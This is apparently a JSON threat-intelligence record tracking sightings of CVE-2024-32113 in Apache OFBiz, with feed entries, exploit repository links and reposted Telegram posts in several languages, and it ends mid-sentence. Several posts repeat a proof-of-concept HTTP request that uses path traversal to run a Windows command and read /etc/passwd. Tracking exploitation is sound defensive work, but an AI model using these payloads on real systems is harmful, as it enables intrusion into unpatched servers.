{"vulnerability": "CVE-2024-32113", "sightings": [{"uuid": "5dfb02a5-5f17-4184-99b5-16dd2421747f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-08-07T18:10:02.000000Z"}, {"uuid": "2a426011-2c74-4fa8-b7c5-0154b2e2cc4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-14)", "content": "", "creation_timestamp": "2025-01-14T00:00:00.000000Z"}, {"uuid": "0d0e0338-6c26-487c-8e16-617840e08b69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "28a7db97-4206-4703-987b-e42fc168a31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:02.000000Z"}, {"uuid": "b15ab169-5454-4542-8f5a-429c8fdac4ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb", "content": "", "creation_timestamp": "2024-06-17T15:39:13.000000Z"}, {"uuid": "e586a800-0471-48a0-9c6c-21c60210e16c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:56.000000Z"}, {"uuid": "d9f7cae2-6fb9-4b38-b1b4-95d9d52f76f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "815267cf-a1d5-4416-a806-3a84675057d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:16.000000Z"}, {"uuid": "c14f1ee0-1ca0-490b-9d7a-d4bebdf69ce0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-32113", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/80dc021f-179d-40d6-aeb8-19482aa8585d", "content": "", "creation_timestamp": "2026-02-02T12:26:32.219555Z"}, {"uuid": "2cce512b-18d6-4d12-ac8c-c71feb152dcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:38.000000Z"}, {"uuid": "5eac3771-3ee8-4780-b1fc-81fe9c7f48bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8190", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32113 Apache OFBIZ Batch Scanning\nURL\uff1ahttps://github.com/YongYe-Security/CVE-2024-32113\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-07T07:14:30.000000Z"}, {"uuid": "1347a4eb-1628-4af8-bc51-4397b588707b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/cve202432113", "content": "", "creation_timestamp": "2025-01-28T23:26:01.000000Z"}, {"uuid": "7ef6b041-1d7d-486c-83e7-53027831676c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7507", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aApache OFBIZ Path traversal leading to RCE EXP\nURL\uff1ahttps://github.com/Mr-xn/CVE-2024-32113\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-03T16:09:34.000000Z"}, {"uuid": "40a1f717-bdb9-4125-8335-8948d8d5942c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9581", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32113 PoC\nURL\uff1ahttps://github.com/MikeyPPPPPPPP/CVE-2024-32113\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-24T09:21:10.000000Z"}, {"uuid": "810b3d63-2be7-402b-946e-f317a6ca44f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/TFgIrRyFVdmt-_iXx8f0LX8Ka84NvNMzkX0RvLq3uNFE64w", "content": "", "creation_timestamp": "2025-10-10T03:00:06.000000Z"}, {"uuid": "da7376d6-e9fe-4697-997d-349ea4163611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/u8Tk1Wc2POt9T15Mw3l9G1TvENAy6h4h4vyQZfJEp1FRhKw", "content": "", "creation_timestamp": "2025-07-11T09:00:04.000000Z"}, {"uuid": "74a214cb-f8fa-4ddd-add9-2292513dfb34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/cibsecurity/79555", "content": "\ud83e\udd85 The Re-Emergence of CVE-2024-32113: How CVE-2024-45195 has amplified Exploitation Risks \ud83e\udd85\n\n  Overview   On September 7, 2024, Cyble Global Sensor Intelligence CGSI identified the active exploitation of CVE202432113, a critical path traversal vulnerability in the Apache OFBiz opensource enterprise resource planning ERP system. This flaw was initially addressed on April 12, 2024, with a formal patch released on May 8, 2024. CVE202432113 allows Threat Actors TAs to execute arbitrary commands by sending specially crafted requests, enabling them to gain unauthorized access and execute arbitrary commands.   On September 4, 2024, the identification of CVE202445195 reignited concerns surrounding Apache OFBiz by revealing a bypass for several previously addressed vulnerabilities, notably CVE202432113. This development has intensified the exploitation of CVE202432113, as attackers expl...\n\n\ud83d\udcd6 Read more.\n\n\ud83d\udd17 Via \"CYBLE\"\n\n----------\n\ud83d\udc41\ufe0f Seen on @cibsecurity", "creation_timestamp": "2024-09-10T19:09:49.000000Z"}, {"uuid": "4cb0eede-77b5-4f07-a05f-4600b654cf7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/AjZiAtjz3X9oVI9kkYa211a-RUOBTsuNgCrdLIAW4aPtRg", "content": "", "creation_timestamp": "2024-06-05T18:27:43.000000Z"}, {"uuid": "f32eae95-7b36-4f38-8459-7dfc18ec8928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/203", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection\n\n\ud83d\udcda ZeroEthical Course \ud83d\udc8e", "creation_timestamp": "2024-05-24T03:20:53.000000Z"}, {"uuid": "0d10895b-45e4-4553-8440-e17910f146e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/HackingInsights/8217", "content": "Increased Activity Against Apache OFBiz CVE-2024-32113, (Wed, Jul 31st)\nhttps://ift.tt/glFqA6d", "creation_timestamp": "2024-08-01T03:33:55.000000Z"}, {"uuid": "f7424d30-d3b1-4f22-8c56-849eebb625ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/dzEU9L8PpKSQtkFqs1TKZKjscCL-BTrtkNkRArY-aBUeBw", "content": "", "creation_timestamp": "2024-06-05T16:08:29.000000Z"}, {"uuid": "2f26eef2-24ad-4c15-a7df-0ae424429a4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/165", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n\n\n\ud83d\udc68\u200d\ud83c\udfeb ZeroEthical Course\ud83d\udcda", "creation_timestamp": "2024-05-23T02:18:39.000000Z"}, {"uuid": "e6493a99-5663-4672-9082-b495d7ec5e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CivilityBreaches/347", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n", "creation_timestamp": "2024-05-21T12:02:35.000000Z"}, {"uuid": "98e9dc63-bd76-4d3f-b4d9-ec5628fc1598", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/227", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n\u00a0 performCommand\n\u00a0 \n\u00a0\u00a0\u00a0 \n\u00a0\u00a0\u00a0\u00a0\u00a0 ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n\u00a0\u00a0\u00a0 \n\u00a0 \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n\u00a0 example.createBlogPost\n\u00a0 \n\u00a0\u00a0\u00a0 \n\u00a0\u00a0\u00a0\u00a0\u00a0 ../../../../../../etc/passwd\n\u00a0\u00a0\u00a0 \n\u00a0 \n", "creation_timestamp": "2024-05-17T02:12:53.000000Z"}, {"uuid": "897f1fea-527f-48e3-a516-4baf9dca5c7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2213", "content": "Apache OfBiz vulns \n*\n\u041f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440: POC\u043e\u0432, RCE\u0451\u0432, CURL\u043e\u0432, Burp\u0441\u044c\u044e\u0442\u043e\u0432\n(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)\n*\n// lInK*/\n\n#apache", "creation_timestamp": "2024-08-06T16:34:23.000000Z"}, {"uuid": "3422a1b6-8df6-429a-b251-92d0ef24b681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/372", "content": "\u200aCVE-2024-32113 \u2013 RCE Vulnerability in Apache OFBiz: Immediate Action Required\n\nhttps://securityonline.info/cve-2024-32113-rce-vulnerability-in-apache-ofbiz-immediate-action-required/", "creation_timestamp": "2024-05-13T14:19:09.000000Z"}, {"uuid": "d942289f-b355-4368-a613-2b2ad25cabf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/A8vVtnjw2dY4soTK8z_RafcnQfUb2ia7BtuexHYzGM_Fj20", "content": "", "creation_timestamp": "2024-06-24T20:00:18.000000Z"}, {"uuid": "2e56beeb-f12c-45f4-93eb-71cd56fcd78f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2082", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n", "creation_timestamp": "2024-05-16T05:52:02.000000Z"}, {"uuid": "0bbd38e2-3cb1-441a-8d35-c68c86967c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10540", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n]-&gt; https://github.com/Mr-xn/CVE-2024-32113\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection", "creation_timestamp": "2024-06-06T05:45:52.000000Z"}, {"uuid": "715b9401-a5e7-4ad1-ba9f-25831b83e6e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "exploited", "source": "https://t.me/true_secator/6056", "content": "\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u0438 Apache OFBiz \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 ERP (Enterprise Resource Planning).\n\nOFBiz, \u043f\u043e-\u0432\u0438\u0434\u0438\u043c\u043e\u043c\u0443, \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u043c\u0435\u043d\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d, \u0447\u0435\u043c \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u044b, \u0442\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c ERP \u0438\u043c\u0435\u0435\u0442 \u043a\u043b\u044e\u0447\u0435\u0432\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n\n\u0410\u0442\u0430\u043a\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043c\u0430\u0435, \u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0439 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0432\u0443\u0445 \u043c\u0435\u0441\u044f\u0446\u0435\u0432 \u0434\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u0430\u0442\u0430\u043a. \u0411\u044b\u043b\u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b \u0432\u0435\u0440\u0441\u0438\u0438 OFBiz \u0434\u043e 18.12.13.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-32113 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043e\u0431\u0445\u043e\u0434 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0432 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 OFBiz.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u0440\u0435\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0443\u0442\u0435\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u043e\u0447\u043a\u0438 \u0441 \u0437\u0430\u043f\u044f\u0442\u043e\u0439 (;) \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e URL-\u0430\u0434\u0440\u0435\u0441\u0430, \u0430 \u0437\u0430\u0442\u0435\u043c \u0447\u0430\u0441\u0442\u043d\u043e\u0433\u043e URL-\u0430\u0434\u0440\u0435\u0441\u0430, \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0445\u043e\u0447\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 URL-\u0430\u0434\u0440\u0435\u0441\u0430, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SANS Internet Storm Center, \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u044d\u0442\u0443 \u043e\u0448\u0438\u0431\u043a\u0443, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0431\u043e\u0442\u043d\u0435\u0442 Mirai. \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u043e \u0432\u043e\u0437\u0440\u043e\u0441\u043b\u0430 \u0441 \u043a\u043e\u043d\u0446\u0430 \u0438\u044e\u043b\u044f.", "creation_timestamp": "2024-08-05T13:04:05.000000Z"}, {"uuid": "e574c0da-e736-4ded-9b96-890e3ea61a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2590", "content": "https://github.com/Mr-xn/CVE-2024-32113\n\nApache OFBIZ Path traversal leading to RCE POC\n#github #poc #exploit", "creation_timestamp": "2024-06-05T16:07:22.000000Z"}, {"uuid": "11906ffd-a6fe-4023-9a73-a1f6557b691d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/true_secator/6065", "content": "\u0412 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 ERP \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c Apache OFBiz \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0434\u043e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430\u0445.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a\u00a0CVE-2024-38856 \u0438 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,8 \u0438\u0437 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0445 10,0, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Apache OFBiz \u0434\u043e 18.12.15.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 SonicWall, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u044b\u0447\u043d\u043e \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u0432\u0445\u043e\u0434\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0447\u0442\u043e 